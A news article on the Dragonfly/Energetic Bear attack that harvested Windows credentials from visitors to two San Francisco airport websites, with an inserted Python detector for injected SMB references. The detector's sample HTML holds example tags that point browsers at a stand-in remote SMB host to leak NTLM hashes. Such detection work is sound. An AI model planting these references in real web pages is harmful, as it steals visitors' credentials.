San Francisco Airport Attack Linked to Russian State Hackers

A cyber-attack on San Francisco International Airport (SFO) last month was carried out by state-sponsored Russian hackers, according to Eset.

As reported by Infosecurity, the airport revealed in a breach notification last week that its SFOConnect.com and SFOConstruction.com websites came under attack in March.

“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” the notice explained. “Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”

However, Eset went further in a social media post yesterday, claiming that the incident was “in line with the TTPs of an APT group known as Dragonfly/Energetic Bear.”

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” it explained.

The firm also dismissed rumors that the attack had been carried out by Magecart digital skimming hackers.

“The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials,” it said.
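The technique Eset describes (a web page that makes a Windows browser fetch a resource over SMB, leaking the visitor's username and NTLM hash) leaves a recognisable trace in the page source. The following is an added, illustrative check, not code from Eset or the article: it parses HTML and flags auto-fetched resource references that point at a `file://` URL or UNC path with a remote host. The HTML and the IP address are constructed for the example.

```python
"""Flag injected HTML that would make a Windows browser open an outbound
SMB connection when the page renders (file:// URLs or UNC paths).
Constructed example; the sample page and host are not from the SFO sites."""
import re
from html.parser import HTMLParser

# Attributes a browser resolves on its own (no click needed for src/data;
# href is included because <link href> is fetched automatically too).
AUTO_FETCH_ATTRS = {"src", "href", "data", "poster", "background"}

# file://<host>/... or file:\\<host>\...; the host group must be non-empty,
# so file:///C:/local.txt (a purely local path) does not match.
FILE_URL_RE = re.compile(r"^\s*file:(?://|\\\\)([^/\\\s]+)", re.IGNORECASE)
# Bare UNC path such as \\203.0.113.5\share\pixel.png
UNC_RE = re.compile(r"^\s*\\\\([^\\\s]+)\\")


def remote_smb_host(value):
    """Return the host the browser would contact over SMB, or None."""
    m = FILE_URL_RE.match(value) or UNC_RE.match(value)
    return m.group(1) if m else None


class SmbLeakFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, attribute, host, raw value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in AUTO_FETCH_ATTRS:
                host = remote_smb_host(value)
                if host:
                    self.findings.append((tag, name, host, value))


def find_smb_references(html):
    parser = SmbLeakFinder()
    parser.feed(html)
    return parser.findings


# Constructed sample: a benign image, a 1x1 "pixel" over SMB, a stylesheet
# via a UNC path, and a local file:// link that should NOT be flagged.
SAMPLE = """<html><body><img src="/logo.png">
<img src="file://203.0.113.5/share/pixel.png" width=1 height=1>
<link rel="stylesheet" href="\\\\203.0.113.5\\share\\style.css">
<a href="file:///C:/local.txt">local</a></body></html>"""

if __name__ == "__main__":
    for tag, attr, host, value in find_smb_references(SAMPLE):
        print(f"<{tag} {attr}> -> SMB host {host}: {value}")
```

Run against saved copies of a site's pages after a suspected injection; blocking outbound TCP 445 at the perimeter stops the hash from leaving even when such a reference is present.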

It’s unclear exactly which visitors to the sites it was going after: SFOConnect appears to be a general information site designed for airport staff and contractors, while the SFOConstruction website, currently down for ‘maintenance,’ covers projects, bids and contracts related to the transport hub.

An Eset researcher confirmed that the vendor itself first reported the issue to the airport, which “quickly” fixed it.

Dragonfly has been active since at least 2011 and started out targeting organizations in the aviation and defense sectors, before moving on to hit energy and other industrial control system (ICS) firms in critical infrastructure industries.

Like many Russian APT groups, this one is known for relatively sophisticated, multi-stage intrusions that often compromise the supply chain first before pivoting into the intended victims' networks for reconnaissance, lateral movement and cyber-espionage.